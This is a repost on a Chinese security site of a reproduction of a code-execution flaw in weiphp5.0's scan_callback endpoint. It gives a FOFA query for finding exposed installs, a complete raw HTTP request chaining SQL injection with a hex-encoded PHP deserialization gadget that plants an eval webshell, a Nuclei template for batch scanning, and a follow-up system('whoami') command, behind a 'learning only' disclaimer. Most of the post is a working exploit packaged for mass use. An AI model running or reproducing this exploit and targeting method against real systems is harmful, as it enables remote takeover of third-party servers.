CTF导航 CTF导航

weiphp5.0 scan_callback 代码执行漏洞

渗透技巧 8个月前 admin
98 0 0

weiphp5.0 scan_callback 代码执行漏洞


weiphp5.0 scan_callback 代码执行漏洞

     漏洞简介

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED



weiphp5.0 scan_callback 存在代码执行漏洞

weiphp5.0 scan_callback 代码执行漏洞

      漏洞复现

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED

weiphp5.0 scan_callback 代码执行漏洞

第一步、使用以下fofa语句进行资产收集…确认测试目标

fofa语句(body="content="WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")

第二步、使用burp抓取数据包发送到Repeater中修改以下数据包进行测试


POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 1340Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
<xml><product_id>aaaa</product_id><appid>exp</appid><appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid><mch_id>aaa</mch_id><nonce_str>aaa</nonce_str><openid>aaa</openid></xml>

weiphp5.0 scan_callback 代码执行漏洞

第三步、使用md5解密

weiphp5.0 scan_callback 代码执行漏洞


weiphp5.0 scan_callback 代码执行漏洞

       批量脚本

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED

weiphp5.0 scan_callback 代码执行漏洞


id: weiphp-cms-scan_callback-rce
info:  name: weiphp-cms-scan_callback-rce  author: unknow  severity: critical  description: weiphp5.0 scan_callback 存在代码执行漏洞。  tags: weiphp,rce  metadata:    fofa-query: (body="content="WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")http:  - raw:      - |        POST /public/index.php/weixin/Notice/index?img={{rce}}exit(); HTTP/1.1        Host:         Content-Type: application/x-www-form-urlencoded
        <xml>        <product_id>aaaa</product_id>        <appid>exp</appid>        <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>        <mch_id>aaa</mch_id>        <nonce_str>aaa</nonce_str>        <openid>aaa</openid>        </xml>
    payloads:      rce:        - "echo+md5(123);"
    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code_1==500 && contains(body_1, "202cb962ac59075b964b07152d234b70") && contains(header_1, "text/html")'
#执行:echo+md5(123);system('whoami');

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!

weiphp5.0 scan_callback 代码执行漏洞

原文始发于微信公众号(揽月安全团队):weiphp5.0 scan_callback 代码执行漏洞

版权声明:admin 发表于 2024年3月13日 上午8:51。
转载请注明:weiphp5.0 scan_callback 代码执行漏洞 | CTF导航

相关文章

From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API
admin
293
Gitlab CVE-2023-2825 一个罕见的目录穿越漏洞
admin
848
命令注入漏洞CVE-2022-34527复现
admin
222
实战|使用Windows API绕过进程保护
admin
840
【漏洞利用系列】漏洞武器化之CVE-2022-22947 Spring Cloud Gateway表达式注入回显与内存马构造
admin
692
Apache IoTDB grafana-connector模块SQL注入分析
admin
951

相关文章

NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0
每日安全动态推送(24/10/29)
0
12.Fastjson(.NET)反序列化点前篇
0
1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)
0